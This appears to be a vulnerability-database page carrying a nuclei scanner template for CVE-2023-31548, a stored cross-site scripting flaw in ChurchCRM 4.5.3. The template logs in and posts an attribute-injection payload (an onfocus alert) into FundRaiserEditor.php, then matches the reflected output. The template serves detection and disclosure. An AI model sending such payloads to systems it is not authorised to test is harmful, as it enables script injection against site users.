Lucene search
K

ChurchCRM v4.5.3 - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

ChurchCRM v4.5.3 - Stored Cross-Site Scripting vulnerability allows injection of arbitrary web scripts via FundRaiserEditor.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-31548
31 May 202314:15
attackerkb
CNNVD
ChurchCRM 跨站脚本漏洞
31 May 202300:00
cnnvd
CVE
CVE-2023-31548
31 May 202300:00
cve
Cvelist
CVE-2023-31548
31 May 202300:00
cvelist
EUVD
EUVD-2023-35849
31 May 202300:00
euvd
NVD
CVE-2023-31548
31 May 202314:15
nvd
OSV
CVE-2023-31548
31 May 202314:15
osv
Prion
Cross site scripting
31 May 202314:15
prion
Positive Technologies
PT-2023-23383 · Churchcrm · Churchcrm
31 May 202300:00
ptsecurity
RedhatCVE
CVE-2023-31548
9 Jan 202612:32
redhatcve
Rows per page
id: CVE-2023-31548

info:
  name: ChurchCRM v4.5.3 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-31548
    - https://nvd.nist.gov/vuln/detail/CVE-2023-31548
    - https://github.com/10splayaSec/CVE-Disclosures
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-31548
    cwe-id: CWE-79
    epss-score: 0.01248
    epss-percentile: 0.65768
    cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: churchcrm
    product: churchcrm
  tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated,vuln

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}
      - |
        POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        FundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "onfocus=\"alert(document.domain)\" autofocus=\"\"></td>")'
          - 'contains(body_2, "ChurchCRM")'
        condition: and
# digest: 4b0a00483046022100fe3a48716924646d922a989571f0ec5eff8f027dda1ba1310c31504d90e6724a022100ba103d68edf61be5a983a851fdd416aa6df2e7d0a9a10c0b0ad7c40d012a9097:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.15.4
EPSS0.01248
SSVC
32